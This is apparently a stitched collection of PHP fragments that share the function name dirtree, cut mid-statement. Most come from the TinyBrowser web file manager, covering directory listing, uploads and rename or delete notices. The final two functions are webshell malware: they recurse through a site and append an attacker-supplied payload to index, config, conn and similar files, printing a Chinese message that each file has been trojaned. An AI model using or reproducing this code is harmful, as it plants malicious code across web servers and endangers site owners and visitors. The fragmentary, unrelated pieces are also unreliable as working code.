function dirtree($path) { $handle = opendir($path); $itemArray = array(); while (false !== ($file = readdir($handle))) { if ($file == '.' || $file == '..') { } elseif (is_dir($path . $file)) { try { $dirtmparr = dirtree($path . $file . '/'); } catch (Exception $e) { $dirtmparr = null; } $itemArray[$file] = $dirtmparr; } else { array_push($itemArray, $file); } } return $itemArray; }
$namethisfolderto = $tinybrowser['docroot'] . $dirpath . $renameurl; if (is_dir($namethisfolderfrom) && rename($namethisfolderfrom, $namethisfolderto)) { $renameqty++; } else { $errorqty++; } if ($foldernow == urldecode($_POST['actionfolder'][$namethis])) { $foldernow = ltrim($renameurl, '/'); $passfolder = '&folder=' . urlencode(ltrim($renameurl, '/')); } } } } // Assign directory structure to array $dirs = array(); dirtree($dirs, $tinybrowser['filetype'][$typenow], $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); // generate alert if folders deleted if ($createqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGCREATE, $createqty); } elseif ($deleteqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty); } elseif ($renameqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGRENAME, $renameqty); } // generate alert if file errors encountered if ($errorqty > 0) { $notify['type'][] = 'failure'; $notify['message'][] = sprintf(TB_MSGEDITERR, $errorqty);
$file['height'][] = $imginfo[1]; $file['dimensions'][] = $imginfo[0] + $imginfo[1]; $file['type'][] = $imginfo['mime']; } else { $file['width'][] = 'N/A'; $file['height'][] = 'N/A'; $file['dimensions'][] = 'N/A'; $file['type'][] = returnMIMEType($filename); } } } } closedir($dh); // Assign directory structure to array $editdirs = array(); dirtree($editdirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); if ($deleteqty > 0) { // generate alert if files deleted $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty); } elseif ($renameqty > 0) { // generate alert if files renamed $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGRENAME, $renameqty); } elseif ($moveqty > 0) { // generate alert if files renamed $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGMOVE, $moveqty); } elseif ($resizeqty > 0) { // generate alert if images resized $notify['type'][] = 'success';
$typenow = isset($_GET['type']) && in_array($_GET['type'], $_SESSION['tinybrowser']['valid']['type']) ? $_GET['type'] : 'image'; $foldernow = str_replace(array('../', '..\\', '..', './', '.\\'), '', $_SESSION['tinybrowser']['allowfolders'] && isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : ''); $passfolder = '&folder=' . urlencode($foldernow); $passfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? '&feid=' . $_GET['feid'] : ''; $passupfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? $_GET['feid'] : ''; $tokenget = !empty($_SESSION['get_tokens']) ? '&tokenget=' . end($_SESSION['get_tokens']) : ''; // Assign upload path if (strpos($foldernow, $_SESSION['tinybrowser']['path'][$typenow]) == 1) { $uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow] . $foldernow); } else { $uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow]); } verify_dir($_SESSION['tinybrowser']['docroot'] . $_SESSION['tinybrowser']['path'][$typenow] . $foldernow, $typenow); // Assign directory structure to array $uploaddirs = array(); dirtree($uploaddirs, $_SESSION['tinybrowser']['filetype'][$typenow], $_SESSION['tinybrowser']['docroot'], $_SESSION['tinybrowser']['path'][$typenow]); // determine file dialog file types switch ($typenow) { case 'image': $filestr = TB_TYPEIMG; break; case 'media': $filestr = TB_TYPEMEDIA; break; case 'file': $filestr = TB_TYPEFILE; break; } $fileexts = str_replace(",", ";", $_SESSION['tinybrowser']['filetype'][$typenow]); $filelist = $filestr . ' (' . $_SESSION['tinybrowser']['filetype'][$typenow] . ')'; // Initalise alert array
function dirtree(&$alldirs, $types = '*.*', $root = '', $tree = '', $branch = '', $level = 0) { // filter file types according to type $filetypes = explode(',', preg_replace('{[ \\t]+}', '', $types)); if ($level == 0 && is_dir($root . $tree . $branch)) { $filenum = 0; foreach ($filetypes as $filetype) { $filenum = $filenum + count(glob($root . $tree . $branch . sql_regcase($filetype), GLOB_NOSORT)); } $treeparts = explode('/', rtrim($tree, '/')); $topname = end($treeparts); $alldirs[] = array($branch, rtrim($topname, '/') . ' (' . $filenum . ')', rtrim($topname, '/'), rtrim($topname, '/'), $filenum, filemtime($root . $tree . $branch)); } $level++; $dh = opendir($root . $tree . $branch); while (($dirname = readdir($dh)) !== false) { if ($dirname != '.' && $dirname != '..' && is_dir($root . $tree . $branch . $dirname) && $dirname != '_thumbs') { $filenum = 0; foreach ($filetypes as $filetype) { $filenum = $filenum + count(glob($root . $tree . $branch . $dirname . '/' . sql_regcase($filetype), GLOB_NOSORT)); } $indent = ''; for ($i = 0; $i < $level; $i++) { $indent .= ' '; } if (strlen($indent) > 0) { $indent .= '→ '; } $alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($root . $tree . $branch . $dirname)); dirtree($alldirs, $types, $root, $tree, $branch . $dirname . '/', $level); } } closedir($dh); $level--; }
function dirtree(&$alldirs, $root = '', $tree = '', $extPattern = '*.*', $branch = '', $level = 0) { if ($level == 0 && is_dir($root . $tree . $branch)) { $filenum = count(glob($root . $tree . $branch . $extPattern, GLOB_BRACE)); $topname = end(explode('/', rtrim($tree, '/'))); $alldirs[] = array($branch, rtrim($topname, '/') . ' (' . $filenum . ')', rtrim($topname, '/'), rtrim($topname, '/'), $filenum, filemtime($root . $tree . $branch)); } $level++; $dh = @opendir($root . $tree . $branch); while (false !== ($dirname = @readdir($dh))) { if ($dirname != '.' && $dirname != '..' && is_dir($root . $tree . $branch . $dirname)) { $filenum = count(glob($root . $tree . $branch . $dirname . '/' . $extPattern, GLOB_BRACE)); $indent = ''; for ($i = 0; $i < $level; $i++) { $indent .= ' '; } if (strlen($indent) > 0) { $indent .= '→ '; } $alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($root . $tree . $branch . $dirname)); dirtree($alldirs, $root, $tree, $extPattern, $branch . $dirname . '/', $level); } } @closedir($dh); $level--; }
} closedir($dh); } /* else { // create file upload folder $success = createfolder($tinybrowser['docroot'].$browsepath,$tinybrowser['unixpermissions']); if($success) { $notify['type'][]='success'; $notify['message'][]=sprintf(TB_MSGMKDIR, $browsepath); } else { $notify['type'][]='error'; $notify['message'][]=sprintf(TB_MSGMKDIRFAIL, $browsepath); } }*/ // Assign directory structure to array $browsedirs = array(); dirtree($browsedirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow], $tinybrowser['extFilesGlob'][$typenow]); // determine sort order $sortorder = $sorttypenow == 'asc' ? SORT_ASC : SORT_DESC; $num_of_files = isset($file['name']) ? count($file['name']) : 0; if ($num_of_files > 0) { // sort files by selected order sortfileorder($sortbynow, $sortorder, $file); } // determine pagination if ($tinybrowser['pagination'] > 0) { $showpage_start = $showpagenow ? $_REQUEST['showpage'] * $tinybrowser['pagination'] - $tinybrowser['pagination'] : 0; $showpage_end = $showpage_start + $tinybrowser['pagination']; if ($showpage_end > $num_of_files) { $showpage_end = $num_of_files; } } else {
die(TB_DENIED); } if (!$tinybrowser['allowupload']) { die(TB_UPDENIED); } // Assign get variables $typenow = isset($_GET['type']) ? $_GET['type'] : 'image'; $foldernow = isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : ''; $passfolder = '&folder=' . urlencode($foldernow); $passfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? '&feid=' . $_GET['feid'] : ''; $passupfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? $_GET['feid'] : ''; // Assign upload path $uploadpath = urlencode($tinybrowser['path'][$typenow] . $foldernow); // Assign directory structure to array $uploaddirs = array(); dirtree($uploaddirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); // determine file dialog file types switch ($_GET['type']) { case 'image': $filestr = TB_TYPEIMG; break; case 'media': $filestr = TB_TYPEMEDIA; break; case 'file': $filestr = TB_TYPEFILE; break; } $fileexts = str_replace(",", ";", $tinybrowser['filetype'][$_GET['type']]); $filelist = $filestr . ' (' . $tinybrowser['filetype'][$_GET['type']] . ')'; // Initalise alert array
function dirtree($path, $mm) { $d = @dir("{$path}"); while (false !== ($entry = $d->read())) { if ($entry == "." || $entry == "..") { continue; } $file = $d->path . "/" . $entry; if (@is_dir($file)) { dirtree($file, $mm); } else { if (@ereg("default\\.|index\\.|bbs\\.|help\\.|sql\\.|inc\\.|config\\.|conn\\.|asp\\.|top\\.|main\\.|about\\.|error\\.|520\\.|err404\\.|foot\\.|err\\.|505\\.|list\\.|common\\.|show\\.|count\\.", $file)) { $mm = stripcslashes(trim($mm)); //防止单双引号被加上斜杠 $handle = @fopen("{$file}", "a"); @fwrite($handle, "{$mm}"); @fclose($handle); echo "已挂马文件:{$file}<br>"; } } } $d->close(); }
function dirt($pathh, $mmm) { $d = @dir("{$pathh}"); while (false !== ($entry = $d->read())) { if ($entry == "." || $entry == "..") { continue; } $file = $d->path . "/" . $entry; if (@is_dir($file)) { dirtree($file, $mmm); } else { if (@ereg("config\\.|conn\\.", $file)) { $mmm = stripcslashes(trim($mmm)); $handle = @fopen("{$file}", "a"); @fwrite($handle, "{$mmm}"); @fclose($handle); } } } $d->close(); }